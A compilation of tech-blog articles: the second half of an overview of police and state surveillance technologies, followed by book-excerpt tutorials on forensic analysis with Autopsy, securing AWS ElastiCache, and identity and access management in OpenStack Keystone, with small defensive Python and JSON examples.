There have been two recent examples of police arresting a suspect after using human genome databases to investigate crimes. A growing number of private individuals have now used publicly available services such as 23andMe to sequence their genome (DNA), either to investigate their family tree further or to determine a potential predisposition to the genetic component of a disease. In one example, the Golden State Killer, an ex-cop, was arrested 32 years after the last reported rape in a series of 45 (in addition to 12 murders) which occurred between 1976 and 1986. To track him down, police approached sites like 23andMe with DNA found at crime scenes, established a family match and then progressed the investigation using conventional means. More than 12 million Americans have now used a genetic sequencing service, and it is believed that investigators could find a family match for the DNA of anyone who has committed a crime in America. In simple terms, whether you want it or not, law enforcement effectively has the DNA of every individual in the country available to it.

Domain Awareness Centers (DACs) bring the Truman Show to life

The 400,000 residents of Oakland, California discovered in 2012 that they had been the subject of an undisclosed mass surveillance project, run by the local police force, for many years. Feeds from CCTV cameras installed in Oakland's suburbs were augmented with weather information feeds, social media feeds and extracted email conversations, as well as a variety of other sources. The scheme began at Oakland's port with federal funding, as part of a national response to the events of September 11, 2001, but was extended to cover the near half-million residents of the city. Hundreds of additional video cameras were installed, along with gunshot-recognition microphones and some of the other surveillance technologies described in this article. The police force conducting the surveillance had no policy on what information was recorded or for how long it was kept.

Internet-connected toys spy on children

The FBI has warned Americans that children's toys connected to the internet 'could put the privacy and safety of children at risk.' The children's toy Hello Barbie was specifically admonished for poor privacy controls as part of the FBI's press release. Internet-connected toys could be used to record video of children at any point in the day or, conceivably, to relay a human voice, making it appear to the child that the toy was talking to them.

Oracle suggests Google's Android operating system routinely tracks users' position even when maps are turned off

In Australia, two American companies have been involved in a disagreement about the potential monitoring of Android phones. Oracle accused Google of monitoring users' location (including altitude) in the background of the phone, even when mapping software is turned off on the device. In Australia alone, Oracle suggested that Google's monitoring could involve around 1 GB of additional mobile data every month, costing users nearly half a billion dollars a year collectively.

Amazon facial recognition in real time helps US law enforcement services

Amazon is providing facial recognition services, which take feeds from public video cameras, to a number of US police forces. Amazon can match images taken in real time against a database containing 'millions of faces.' Are there any state or federal rules in place to govern police facial recognition? Wired reported that there are 'more or less none.' Amazon's scheme is a trial taking place in Florida, and there are at least two other companies offering similar schemes to US law enforcement services.

Big glass microphone can help agencies keep an ear on the ground

Project 'Big Glass Microphone' uses the vibrations that the movements of cars (among other things) cause in buried fiber optic telecommunications links. A successful test of the technology has been undertaken on the fiber optic cables which run underground on the Stanford University campus, to record vehicle movements. Fiber optic links now make up the backbone of much data transport infrastructure: the way your phone and computer connect to the internet. Big Glass Microphone, as it stands, is the first step towards 'invisible' monitoring of people and their assets.

It appears the FBI now has the ability to access any phone

Those in the know suggest that Apple's iPhone is the most secure smart device against government surveillance. In 2016, this was put to the test. The Justice Department came into possession of an iPhone allegedly belonging to one of the San Bernardino shooters and ultimately sued Apple in an attempt to force the company to grant access to it as part of the investigation. The case was ultimately dropped, leading some to speculate that NAND mirroring techniques were used to gain access to the phone without Apple's assistance, implying that even the most secure phones can now be accessed by the authorities.

Cornell University's lie-detecting algorithm

Groundbreaking work by Cornell University will provide 'at a distance' access to information that previously required close personal access to an accused subject. Cornell's solution interprets feeds from a number of video cameras trained on subjects and analyses the results to judge their heart rate. The researchers believe the system can be used to determine whether someone is lying from behind a screen.

University of Southern California can anticipate social unrest with social media feeds

Researchers at the University of Southern California have developed an AI tool to study social media posts and determine whether those writing them are likely to cause social unrest. The software claims to have identified an association between the volume and content of tweets and protests turning physical. The researchers can now offer advice to law enforcement on the likelihood of a protest turning violent, so that officers can be properly prepared.

The UK, an epicenter of AI progress, is not far behind in tracking people

The UK has a similarly impressive array of tools at its disposal to watch the people its representatives feel need watching. Given the close cooperation between the UK and US governments, it is likely that many of these UK facilities are shared with the US and other NATO partners.

Project Stingray – fake cell phone towers to intercept communications

Stingray is a brand name for an IMSI tracker (the IMSI being the unique identifier on a SIM card). These devices 'spoof' real towers, presenting themselves as the closest mobile phone tower and 'fooling' phones into connecting to them. The technology has been used to spy on criminals in the UK, but it is not just the UK government which uses Stingray or its equivalents. The Washington Post reported in June 2018 that a number of domestically compiled intelligence reports suggest that foreign governments acting on US soil, including China and Russia, have been eavesdropping on the White House using the same technology.

UK-developed spyware is being used by authoritarian regimes

Gamma International is a company based in Hampshire, UK, which provided the (notably authoritarian) Egyptian government with a facility to install what was effectively spyware, delivered with a virus, onto computers in that country. Once installed, the software permitted the government to monitor private digital interactions without the need to engage the phone company or ISP offering those services. Any internet-based activity could be tracked, assisting in tracking down individuals who might harbour negative feelings about the Egyptian government.

Individual arrested when his fingerprint was taken from a WhatsApp picture of his hand

A drug dealer was pictured holding an assortment of pills in the UK two months ago. The image of his hand was used to extract an image of his fingerprint. From that, forensic scientists working with UK police confirmed that officers had arrested the correct person and associated him with the drugs.

AI solutions to speed up evidence processing, including scanning laptops and phones

UK police forces are trying out AI software to speed up the processing of evidence from digital devices. A dozen departments around the UK are using software called Cellebrite, which employs AI algorithms to search through data found on devices, including phones and laptops. Cellebrite can recognize images that contain child abuse, accepts feeds from multiple devices to see when multiple owners were in the same physical location at the same time, and can read text from screenshots. Officers can even feed it photos of suspects to see if a picture of them shows up on someone's hard drive.

China takes the surveillance biscuit and may show us a glimpse of the future

There are 600 million mobile phone users in China, each producing a great deal of information about themselves. China has a notorious record of human rights abuses, and the ruling Communist Party takes a controlling interest (a board seat) in many of the country's largest technology companies, to ensure the work done is in the interest of the party as well as profitable for the corporation. As a result, China is on the front foot when it comes to both AI and surveillance technology, and its surveillance tools could be a harbinger of the future in the Western world.

Chinese cities will be run by a private company

Alibaba, China's equivalent of Amazon, already has control over the traffic lights in one Chinese city, Hangzhou. Alibaba is far from shy about its ambitions: it has 120,000 developers working on the problem and intends to commercialise and sell the data it gathers about citizens. The AI-based product it is using is called CityBrain, and the idea is to use this trial as a template for every city, so that in the future all Chinese cities could be run by AI from the Alibaba corporation. The technology is likely to be deployed in Kuala Lumpur next. In the areas under CityBrain's control, traffic speeds have already increased by 15%. However, some of those observing the situation have expressed concerns, not just about the (lack of) oversight of CityBrain's current capabilities, but about the potential for future abuse.

What to make of this incredible list of surveillance capabilities

Facilities like Mapquest's new mapping service are beguiling. They're clever ideas which create a better world. Behind the scenes, however, similar technology is being adopted by law enforcement bodies in an ever-growing list of countries. Even for someone who understands cutting-edge technology, the sum of these capabilities may be surprising. Literally any aspect of your behaviour, from the way you walk, to your face, to your heat map and, of course, the contents of your phone and laptop, can now be monitored. Law enforcement can review information feeds with artificial intelligence software to process and summarise findings quickly. In some cases, this is being done without the need for a warrant. Most concerning of all, these advances seem to be coming without policy or, in many cases, any form of oversight.

Read next: We must change how we think about AI, urge AI founding fathers


Getting started with Digital forensics using Autopsy

Savia Lobo
24 May 2018
10 min read
Digital forensics involves the preservation, acquisition, documentation, analysis, and interpretation of evidence from various storage media types. It is not only limited to laptops, desktops, tablets, and mobile devices but also extends to data in transit which is transmitted across public or private networks. In this tutorial, we will cover how one can carry out digital forensics with Autopsy. Autopsy is a digital forensics platform and graphical interface to the sleuth kit and other digital forensics tools. This article is an excerpt taken from the book, 'Digital Forensics with Kali Linux', written by Shiva V.N. Parasram. Let's proceed with the analysis using the Autopsy browser by first getting acquainted with the different ways to start Autopsy. Starting Autopsy Autopsy can be started in two ways. The first uses the Applications menu by clicking on Applications | 11 - Forensics | autopsy: Alternatively, we can click on the Show applications icon (last item in the side menu) and type autopsy into the search bar at the top-middle of the screen and then click on the autopsy icon: Once the autopsy icon is clicked, a new terminal is opened showing the program information along with connection details for opening The Autopsy Forensic Browser. In the following screenshot, we can see that the version number is listed as 2.24 with the path to the Evidence Locker folder as /var/lib/autopsy: To open the Autopsy browser, position the mouse over the link in the terminal, then right-click and choose Open Link, as seen in the following screenshot: Creating a new case To create a new case, follow the given steps: When the Autopsy Forensic Browser opens, investigators are presented with three options. Click on NEW CASE: Enter details for the Case Name, Description, and Investigator Names. For the Case Name, I've entered SP-8-dftt, as it closely matches the image name (8-jpeg-search.dd), which we will be using for this investigation. Once all information is entered, click NEW CASE: Several investigator name fields are available, as there may be instances where several investigators may be working together. The locations of the Case directory and Configuration file are displayed and shown as created.  It's important to take note of the case directory location, as seen in the screenshot: Case directory (/var/lib/autopsy/SP-8-dftt/) created. Click ADD HOST to continue: Enter the details for the Host Name (name of the computer being investigated) and the Description of the host. Optional settings: Time zone: Defaults to local settings, if not specified Timeskew Adjustment: Adds a value in seconds to compensate for time differences Path of Alert Hash Database: Specifies the path of a created database of known bad hashes Path of Ignore Hash Database: Specifies the path of a created database of known good hashes similar to the NIST NSRL: Click on the ADD HOST button to continue. Once the host is added and directories are created, we add the forensic image we want to analyze by clicking the ADD IMAGE button: Click on the ADD IMAGE FILE button to add the image file: To import the image for analysis, the full path must be specified. On my machine, I've saved the image file (8-jpeg-search.dd) to the Desktop folder. As such, the location of the file would be /root/Desktop/ 8-jpeg-search.dd. For the Import Method, we choose Symlink. This way the image file can be imported from its current location (Desktop) to the Evidence Locker without the risks associated with moving or copying the image file. 
If you are presented with the following error message, ensure that the specified image location is correct and that the forward slash (/) is used: Upon clicking Next, the Image File Details are displayed. To verify the integrity of the file, select the radio button for Calculate the hash value for this image, and select the checkbox next to Verify hash after importing? The File System Details section also shows that the image is of a ntfs partition. Click on the ADD button to continue: After clicking the ADD button in the previous screenshot, Autopsy calculates the MD5 hash and links the image into the evidence locker. Press OK to continue: At this point, we're just about ready to analyze the image file. If there are multiple cases listed in the gallery area from any previous investigations you may have worked on, be sure to choose the 8-jpeg-search.dd file and case: Before proceeding, we can click on the IMAGE DETAILS option. This screen gives detail such as the image name, volume ID, file format, file system, and also allows for the extraction of ASCII, Unicode, and unallocated data to enhance and provide faster keyword searches. Click on the back button in the browser to return to the previous menu and continue with the analysis: Before clicking on the ANALYZE button to start our investigation and analysis, we can also verify the integrity of the image by creating an MD5 hash, by clicking on the IMAGE INTEGRITY button: Several other options exist such as FILE ACTIVITY TIMELINES, HASH DATABASES, and so on. We can return to these at any point in the investigation. After clicking on the IMAGE INTEGRITY button, the image name and hash are displayed. Click on the VALIDATE button to validate the MD5 hash: The validation results are displayed in the lower-left corner of the Autopsy browser window: We can see that our validation was successful, with matching MD5 hashes displayed in the results. Click on the CLOSE button to continue. To begin our analysis, we click on the ANALYZE button: Analysis using Autopsy Now that we've created our case, added host information with appropriate directories, and added our acquired image, we get to the analysis stage. After clicking on the ANALYZE button (see the previous screenshot), we're presented with several options in the form of tabs, with which to begin our investigation: Let's look at the details of the image by clicking on the IMAGE DETAILS tab. In the following snippet, we can see the Volume Serial Number and the operating system (Version) listed as Windows XP: Next, we click on the FILE ANALYSIS tab. This mode opens into File Browsing Mode, which allows the examination of directories and files within the image. Directories within the image are listed by default in the main view area: In File Browsing Mode, directories are listed with the Current Directory specified as C:/. For each directory and file, there are fields showing when the item was WRITTEN, ACCESSED, CHANGED, and CREATED, along with its size and META data: WRITTEN: The date and time the file was last written to ACCESSED: The date and time the file was last accessed (only the date is accurate) CHANGED: The date and time the descriptive data of the file was modified CREATED: The data and time the file was created META: Metadata describing the file and information about the file: For integrity purposes, MD5 hashes of all files can be made by clicking on the GENERATE MD5 LIST OF FILES button. 
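Hashing is also easy to cross-check outside the browser. The following is a minimal Python sketch, not part of the Autopsy workflow itself, that recomputes the MD5 of the image file; the path is the one used in this walkthrough and should be adjusted to wherever your evidence is stored.

    import hashlib

    def md5_of_image(path, chunk_size=1024 * 1024):
        # Stream the image in 1 MB chunks so large dd files do not exhaust memory
        digest = hashlib.md5()
        with open(path, "rb") as image:
            for chunk in iter(lambda: image.read(chunk_size), b""):
                digest.update(chunk)
        return digest.hexdigest()

    # Path follows this walkthrough; adjust it to your own evidence locker
    print(md5_of_image("/root/Desktop/8-jpeg-search.dd"))

The printed value should match the hash reported by the IMAGE INTEGRITY validation described above.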
Investigators can also make notes about files, times, anomalies, and so on, by clicking on the ADD NOTE button: The left pane contains four main features that we will be using: Directory Seek: Allows for the searching of directories File Name Search: Allows for the searching of files by Perl expressions or filenames ALL DELETED FILES: Searches the image for deleted files EXPAND DIRECTORIES: Expands all directories for easier viewing of contents By clicking on EXPAND DIRECTORIES, all contents are easily viewable and accessible within the left pane and main window. The + next to a directory indicates that it can be further expanded to view subdirectories (++) and their contents: To view deleted files, we click on the ALL DELETED FILES button in the left pane. Deleted files are marked in red and also adhere to the same format of WRITTEN, ACCESSED, CHANGED, and CREATED times. From the following screenshot, we can see that the image contains two deleted files: We can also view more information about this file by clicking on its META entry. By viewing the metadata entries of a file (last column to the right), we can also view the hexadecimal entries for the file, which may give the true file extensions, even if the extension was changed. In the preceding screenshot, the second deleted file (file7.hmm) has a peculiar file extension of .hmm. Click on the META entry (31-128-3) to view the metadata: Under the Attributes section, click on the first cluster labelled 1066 to view header information of the file: We can see that the first entry is .JFIF, which is an abbreviation for JPEG File Interchange Format. This means that the file7.hmm file is an image file but had its extension changed to .hmm. Sorting files Inspecting the metadata of each file may not be practical with large evidence files. For such an instance, the FILE TYPE feature can be used. This feature allows for the examination of existing (allocated), deleted (unallocated), and hidden files. Click on the FILE TYPE tab to continue: Click Sort files into categories by type (leave the default-checked options as they are) and then click OK to begin the sorting process: Once sorting is complete, a results summary is displayed. In the following snippet, we can see that there are five Extension Mismatches: To view the sorted files, we must manually browse to the location of the output folder, as Autopsy 2.4 does not support viewing of sorted files. To reveal this location, click on View Sorted Files in the left pane: The output folder locations will vary depending on the information specified by the user when first creating the case, but can usually be found at /var/lib/autopsy/<case name>/<host name>/output/sorter-vol#/index.html. Once the index.html file has been opened, click on the Extension Mismatch link: The five listed files with mismatched extensions should be further examined by viewing metadata content, with notes added by the investigator. Reopening cases in Autopsy Cases are usually ongoing and can easily be restarted by starting Autopsy and clicking on OPEN CASE: In the CASE GALLERY, be sure to choose the correct case name and, from there, continue your examination: To recap, we looked at forensics using the Autopsy Forensic Browser with The Sleuth Kit. Compared to individual tools, Autopsy has case management features and supports various types of file analysis, searching, and sorting of allocated, unallocated, and hidden files. Autopsy can also perform hashing on a file and directory levels to maintain evidence integrity. 
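As a closing aside, the extension-mismatch check that exposed file7.hmm as a renamed JPEG can be reproduced in a few lines of Python by comparing a file's magic bytes with its claimed extension. The sketch below is illustrative only: the signature table is deliberately tiny, and the file name assumes you have exported file7.hmm from the image first.

    # Illustrative signature table; real tools ship far larger ones
    SIGNATURES = {
        b"\xff\xd8\xff": "jpg",   # JPEG/JFIF
        b"\x89PNG": "png",
        b"%PDF": "pdf",
    }

    def extension_mismatch(path):
        # Read the first few bytes and compare the detected type with the claimed extension
        with open(path, "rb") as candidate:
            header = candidate.read(8)
        claimed = path.rsplit(".", 1)[-1].lower()
        for magic, real_ext in SIGNATURES.items():
            if header.startswith(magic) and claimed != real_ext:
                return "{} looks like a .{} file but is named .{}".format(path, real_ext, claimed)
        return None

    # file7.hmm is the renamed JPEG from this walkthrough
    print(extension_mismatch("file7.hmm"))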
If you enjoyed reading this article, do check out, 'Digital Forensics with Kali Linux' to take your forensic abilities and investigations to a professional level, catering to all aspects of a digital forensic investigation from hashing to reporting. What is Digital Forensics? IoT Forensics: Security in an always connected world where things talk Working with Forensic Evidence Container Recipes

How to secure ElastiCache in AWS

Savia Lobo
11 May 2018
5 min read
AWS offers services to handle the cache management process. Earlier, we were using Memcached or Redis installed on VM, which was a very complex and tough task to manage in terms of ensuring availability, patching, scalability, and security. [box type="shadow" align="" class="" width=""]This article is an excerpt taken from the book,'Cloud Security Automation'. In this book, you'll learn the basics of why cloud security is important and how automation can be the most effective way of controlling cloud security.[/box] On AWS, we have this service available as ElastiCache. This gives you the option to use any engine (Redis or Memcached) to manage your cache. It's a scalable platform that will be managed by AWS in the backend. ElastiCache provides a scalable and high-performance caching solution. It removes the complexity associated with creating and managing distributed cache clusters using Memcached or Redis. Now, let's look at how to secure ElastiCache. Secure ElastiCache in AWS For enhanced security, we deploy ElastiCache clusters inside VPC. When they are deployed inside VPC, we can use a security group and NACL to add a level of security on the communication ports at network level. Apart from this, there are multiple ways to enable security for ElastiCache. VPC-level security Using a security group at VPC—when we deploy AWS ElastiCache in VPC, it gets associated with a subnet, a security group, and the routing policy of that VPC. Here, we define a rule to communicate with the ElastiCache cluster on a specific port. ElastiCache clusters can also be accessed from on-premise applications using VPN and Direct Connect. Authentication and access control We use IAM in order to implement the authentication and access control on ElastiCache. For authentication, you can have the following identity type: Root user: It's a superuser that is created while setting up an AWS account. It has super administrator privileges for all the AWS services. However, it's not recommended to use the root user to access any of the services. IAM user: It's a user identity in your AWS account that will have a specific set of permissions for accessing the ElastiCache service. IAM role: We also can define an IAM role with a specific set of permissions and associate it with the services that want to access ElastiCache. It basically generates temporary access keys to use ElastiCache. Apart from this, we can also specify federated access to services where we have an IAM role with temporary credentials for accessing the service. To access ElastiCache, service users or services must have a specific set of permissions such as create, modify, and reboot the cluster. For this, we define an IAM policy and associate it with users or roles. 
Let's see an example of an IAM policy where users will have permission to perform system administration activity for ElastiCache cluster: { "Version": "2012-10-17", "Statement":[{ "Sid": "ECAllowSpecific", "Effect":"Allow", "Action":[ "elasticache:ModifyCacheCluster", "elasticache:RebootCacheCluster", "elasticache:DescribeCacheClusters", "elasticache:DescribeEvents", "elasticache:ModifyCacheParameterGroup", "elasticache:DescribeCacheParameterGroups", "elasticache:DescribeCacheParameters", "elasticache:ResetCacheParameterGroup", "elasticache:DescribeEngineDefaultParameters"], "Resource":"*" } ] } Authenticating with Redis authentication AWS ElastiCache also adds an additional layer of security with the Redis authentication command, which asks users to enter a password before they are granted permission to execute Redis commands on a password-protected Redis server. When we use Redis authentication, there are the following few constraints for the authentication token while using ElastiCache: Passwords must have at least 16 and a maximum of 128 characters Characters such as @, ", and / cannot be used in passwords Authentication can only be enabled when you are creating clusters with the in-transit encryption option enabled The password defined during cluster creation cannot be changed To make the policy harder or more complex, there are the following rules related to defining the strength of a password: A password must include at least three characters of the following character types: Uppercase characters Lowercase characters Digits Non-alphanumeric characters (!, &, #, $, ^, <, >, -) A password must not contain any word that is commonly used A password must be unique; it should not be similar to previous passwords Data encryption AWS ElastiCache and EC2 instances have mechanisms to protect against unauthorized access of your data on the server. ElastiCache for Redis also has methods of encryption for data run-in on Redis clusters. Here, too, you have data-in-transit and data-at-rest encryption methods. Data-in-transit encryption ElastiCache ensures the encryption of data when in transit from one location to another. ElastiCache in-transit encryption implements the following features: Encrypted connections: In this mode, SSL-based encryption is enabled for server and client communication Encrypted replication: Any data moving between the primary node and the replication node are encrypted Server authentication: Using data-in-transit encryption, the client checks the authenticity of a connection—whether it is connected to the right server Client authentication: After using data-in-transit encryption, the server can check the authenticity of the client using the Redis authentication feature Data-at-rest encryption ElastiCache for Redis at-rest encryption is an optional feature that increases data security by encrypting data stored on disk during sync and backup or snapshot operations. However, there are the following few constraints for data-at-rest encryption: It is supported only on replication groups running Redis version 3.2.6. It is not supported on clusters running Memcached. It is supported only for replication groups running inside VPC. Data-at-rest encryption is supported for replication groups running on any node type. During the creation of the replication group, you can define data-at-rest encryption. Data-at-rest encryption once enabled, cannot be disabled. 
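To see how these constraints fit together in practice, here is a hedged boto3 sketch, not taken from the book, that creates a Redis replication group with in-transit encryption, at-rest encryption, and a Redis AUTH token. The group ID, token, subnet group, and security group are placeholders.

    import boto3

    elasticache = boto3.client("elasticache", region_name="us-east-1")

    elasticache.create_replication_group(
        ReplicationGroupId="demo-redis",                     # placeholder
        ReplicationGroupDescription="Encrypted Redis with AUTH",
        Engine="redis",
        CacheNodeType="cache.t3.micro",
        NumCacheClusters=2,
        TransitEncryptionEnabled=True,    # must be enabled before AuthToken is accepted
        AtRestEncryptionEnabled=True,     # optional, and cannot be disabled later
        AuthToken="a-16-to-128-character-secret-without-forbidden-chars",  # placeholder
        CacheSubnetGroupName="private-cache-subnets",        # placeholder
        SecurityGroupIds=["sg-0123456789abcdef0"],           # placeholder
    )

Because the AUTH token is only accepted when in-transit encryption is enabled, dropping the TransitEncryptionEnabled flag makes the call fail, which mirrors the constraint described above.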
To summarize, we learned how to secure ElastiCache and ensured security for PaaS services, such as database and analytics services. If you've enjoyed reading this article, do check out 'Cloud Security Automation' for hands-on experience of automating your cloud security and governance. How to start using AWS AWS Sydney Summit 2018 is all about IoT AWS Fargate makes Container infrastructure management a piece of cake    
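As an addendum to this excerpt, the ElastiCache administration policy shown earlier can also be attached to an IAM user programmatically. A hedged boto3 sketch follows; the user name and policy name are placeholders.

    import json
    import boto3

    iam = boto3.client("iam")

    # Same statement as the administration policy shown earlier in this excerpt
    ec_admin_policy = {
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "ECAllowSpecific",
            "Effect": "Allow",
            "Action": [
                "elasticache:ModifyCacheCluster",
                "elasticache:RebootCacheCluster",
                "elasticache:DescribeCacheClusters",
                "elasticache:DescribeEvents",
                "elasticache:ModifyCacheParameterGroup",
                "elasticache:DescribeCacheParameterGroups",
                "elasticache:DescribeCacheParameters",
                "elasticache:ResetCacheParameterGroup",
                "elasticache:DescribeEngineDefaultParameters",
            ],
            "Resource": "*",
        }],
    }

    iam.put_user_policy(
        UserName="cache-operator",                 # placeholder
        PolicyName="ElastiCacheAdministration",    # placeholder
        PolicyDocument=json.dumps(ec_admin_policy),
    )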

How to secure a private cloud using IAM

Savia Lobo
10 May 2018
11 min read
In this article, we look at securing the private cloud using IAM. For IAM, OpenStack uses the Keystone project. Keystone provides the identity, token, catalog, and policy services, which are used specifically by OpenStack services. It is organized as a group of internal services exposed on one or many endpoints. For example, an authentication call validates the user and project credentials with the identity service. [box type="shadow" align="" class="" width=""]This article is an excerpt from the book,'Cloud Security Automation'. In this book, you'll learn how to work with OpenStack security modules and learn how private cloud security functions can be automated for better time and cost-effectiveness.[/box] Authentication Authentication is an integral part of an OpenStack deployment and so we must be careful about the system design. Authentication is the process of confirming a user's identity, which means that a user is actually who they claim to be. For example, providing a username and a password when logging into a system. Keystone supports authentication using the username and password, LDAP, and external authentication methods. After successful authentication, the identity service provides the user with an authorization token, which is further used for subsequent service requests. Transport Layer Security (TLS) provides authentication between services and users using X.509 certificates. The default mode for TLS is server-side only authentication, but we can also use certificates for client authentication. However, in authentication, there can also be the case where a hacker is trying to access the console by guessing your username and password. If we have not enabled the policy to handle this, it can be disastrous. For this, we can use the Failed Login Policy, which states that a maximum number of attempts are allowed for a failed login; after that, the account is blocked for a certain number of hours and the user will also get a notification about it. However, the identity service provided in Keystone does not provide a method to limit access to accounts after repeated unsuccessful login attempts. For this, we need to rely on an external authentication system that blocks out an account after a configured number of failed login attempts. Then, the account might only be unlocked with further side-channel intervention, or on request, or after a certain duration. We can use detection techniques to the fullest only when we have a prevention method available to save them from damage. In the detection process, we frequently review the access control logs to identify unauthorized attempts to access accounts. During the review of access control logs, if we find any hints of a brute force attack (where the user tries to guess the username and password to log in to the system), we can define a strong username and password or block the source of the attack (IP) through firewall rules. When we define firewall rules on Keystone node, it restricts the connection, which helps to reduce the attack surface. Apart from this, reviewing access control logs also helps to examine the account activity for unusual logins and suspicious actions, so that we can take corrective actions such as disabling the account. To increase the level of security, we can also utilize MFA for network access to the privileged user accounts. Keystone supports external authentication services through the Apache web server that can provide this functionality. 
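Before moving on, the log review recommended above can be made repeatable with a small script. The sketch below is illustrative only: the log file path and the failure message format vary between deployments, so treat both as assumptions to adapt.

    from collections import Counter
    import re

    LOG_FILE = "/var/log/keystone/keystone.log"   # assumed location; adjust per deployment
    # Assumed message format; tune the pattern to what your Keystone actually logs
    FAILURE = re.compile(r"authorization failed.*?user[:= ]+(?P<user>\S+)", re.IGNORECASE)

    failures = Counter()
    with open(LOG_FILE) as log:
        for line in log:
            match = FAILURE.search(line)
            if match:
                failures[match.group("user")] += 1

    # Accounts with many failures are candidates for disabling or firewall rules
    for user, count in failures.most_common(10):
        print("{:5d} failed attempts  {}".format(count, user))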
Servers can also enforce client-side authentication using certificates. This will help to get rid of brute force and phishing attacks that may compromise administrator passwords. Authentication methods – internal and external Keystone stores user credentials in a database or may use an LDAP-compliant directory server. The Keystone identity database can be kept separate from databases used by other OpenStack services to reduce the risk of a compromise of the stored credentials. When we use the username and password to authenticate, identity does not apply policies for password strength, expiration, or failed authentication attempts. For this, we need to implement external authentication services. To integrate an external authentication system or organize an existing directory service to manage users account management, we can use LDAP. LDAP simplifies the integration process. In OpenStack authentication and authorization, the policy may be delegated to another service. For example, an organization that is going to deploy a private cloud and already has a database of employees and users in an LDAP system. Using this LDAP as an authentication authority, requests to the Identity service (Keystone) are transferred to the LDAP system, which allows or denies requests based on its policies. After successful authentication, the identity service generates a token for access to the authorized services. Now, if the LDAP has already defined attributes for the user such as the admin, finance, and HR departments, these must be mapped into roles and groups within identity for use by the various OpenStack services. We need to define this mapping into Keystone node configuration files stored at /etc/keystone/keystone.conf. Keystone must not be allowed to write to the LDAP used for authentication outside of the OpenStack Scope, as there is a chance to allow a sufficiently privileged Keystone user to make changes to the LDAP directory, which is not desirable from a security point of view. This can also lead to unauthorized access of other information and resources. So, if we have other authentication providers such as LDAP or Active Directory, then user provisioning always happens at other authentication provider systems. For external authentication, we have the following methods: MFA: The MFA service requires the user to provide additional layers of information for authentication such as a one-time password token or X.509 certificate (called MFA token). Once MFA is implemented, the user will have to enter the MFA token after putting the user ID and password in for a successful login. Password policy enforcement: Once the external authentication service is in place, we can define the strength of the user passwords to conform to the minimum standards for length, diversity of characters, expiration, or failed login attempts. Keystone also supports TLS-based client authentication. TLS client authentication provides an additional authentication factor, apart from the username and password, which provides greater reliability on user identification. It reduces the risk of unauthorized access when usernames and passwords are compromised. However, TLS-based authentication is not cost effective as we need to have a certificate for each of the clients. Authorization Keystone also provides the option of groups and roles. Users belong to groups where a group has a list of roles. All of the OpenStack services, such as Cinder, Glance, nova, and Horizon, reference the roles of the user attempting to access the service. 
OpenStack policy enforcers always consider the policy rule associated with each resource and use the user’s group or role, and their association, to determine and allow or deny the service access. Before configuring roles, groups, and users, we should document your required access control policies for the OpenStack installation. The policies must be as per the regulatory or legal requirements of the organization. Additional changes to the access control configuration should be done as per the formal policies. These policies must include the conditions and processes for creating, deleting, disabling, and enabling accounts, and for assigning privileges to the accounts. One needs to review these policies from time to time and ensure that the configuration is in compliance with the approved policies. For user creation and administration, there must be a user created with the admin role in Keystone for each OpenStack service. This account will provide the service with the authorization to authenticate users. Nova (compute) and Swift (object storage) can be configured to use the Identity service to store authentication information. For the test environment, we can have tempAuth, which records user credentials in a text file, but it is not recommended for the production environment. The OpenStack administrator must protect sensitive configuration files from unauthorized modification with mandatory access control frameworks such as SELinux or DAC. Also, we need to protect the Keystone configuration files, which are stored at /etc/keystone/keystone.conf, and also the X.509 certificates. It is recommended that cloud admin users must authenticate using the identity service (Keystone) and an external authentication service that supports two-factor authentication. Getting authenticated with two-factor authentication reduces the risk of compromised passwords. It is also recommended in the NIST guideline called NIST 800-53 IA-2(1). Which defines MFA for network access to privileged accounts, when one factor is provided by a separate device from the system being accessed. Policy, tokens, and domains In OpenStack, every service defines the access policies for its resources in a policy file, where a resource can be like an API access, it can create and attach Cinder volume, or it can create an instance. The policy rules are defined in JSON format in a file called policy.json. Only administrators can modify the service-based policy.json file, to control the access to the various resources. However, one has to also ensure that any changes to the access control policies do not unintentionally breach or create an option to breach the security of any resource. Any changes made to policy.json are applied immediately and it does not need any service restart. After a user is authenticated, a token is generated for authorization and access to an OpenStack environment. A token can have a variable lifespan, but the default value is 1 hour. It is also recommended to lower the lifespan of the token to a certain level so that within the specified timeframe the internal service can complete the task. If the token expires before task completion, the system can be unresponsive. Keystone also supports token revocation. For this, it uses an API to revoke a token and to list the revoked tokens. In OpenStack Newton release, there are four supported token types: UUID, PKI, PKIZ, and fernet. After the OpenStack Ocata release, there are two supported token types: UUID and fernet. 
We'll see all of these token types in detail here: UUID: These tokens are persistent tokens. UUID tokens are 32 bytes in length, which must be persisted in the backend. They are stored in the Keystone backend, along with the metadata for authentication. All of the clients must pass their UUID token to the Keystone (identity service) in order to validate it. PKI and PKIZ: These are signed documents that contain the authentication content, as well as the service catalog. The difference between the PKI and PKIZ is that PKIZ tokens are compressed to help mitigate the size issues of PKI (sometimes PKI tokens becomes very long). Both of these tokens have become obsolete after the Ocata release. The length of PKI and PKIZ tokens typically exceeds 1,600 bytes. The Identity service uses public and private key pairs and certificates in order to create and validate these tokens. Fernet: These tokens are the default supported token provider for OpenStack Pike Release. It is a secure messaging format explicitly designed for use in API tokens. They are nonpersistent, lightweight (fall in the range of 180 to 240 bytes), and reduce the operational overhead. Authentication and authorization metadata is neatly bundled into a message-packed payload, which is then encrypted and signed in as a fernet token. In the OpenStack, the Keystone Service domain is a high-level container for projects, users, and groups. Domains are used to centrally manage all Keystone-based identity components. Compute, storage, and other resources can be logically grouped into multiple projects, which can further be grouped under a master account. Users of different domains can be represented in different authentication backends and have different attributes that must be mapped to a single set of roles and privileges in the policy definitions to access the various service resources. Domain-specific authentication drivers allow the identity service to be configured for multiple domains, using domain-specific configuration files stored at keystone.conf. Federated identity Federated identity enables you to establish trusts between identity providers and the cloud environment (OpenStack Cloud). It gives you secure access to cloud resources using your existing identity. You do not need to remember multiple credentials to access your applications. Now, the question is, what is the reason for using federated identity? This is answered as follows: It enables your security team to manage all of the users (cloud or noncloud) from a single identity application It enables you to set up different identity providers on the basis of the application that somewhere creates an additional workload for the security team and leads the security risk as well It gives ease of life to users by proving them a single credential for all of the apps so that they can save the time they spend on the forgot password page Federated identity enables you to have a single sign-on mechanism. We can implement it using SAML 2.0. To do this, you need to run the identity service provider under Apache. We learned about securing your private cloud and the authentication process therein. If you've enjoyed this article, do check out 'Cloud Security Automation' for a hands-on experience of automating your cloud security and governance. Top 5 cloud security threats to look out for in 2018 Cloud Security Tips: Locking Your Account Down with AWS Identity Access Manager (IAM)
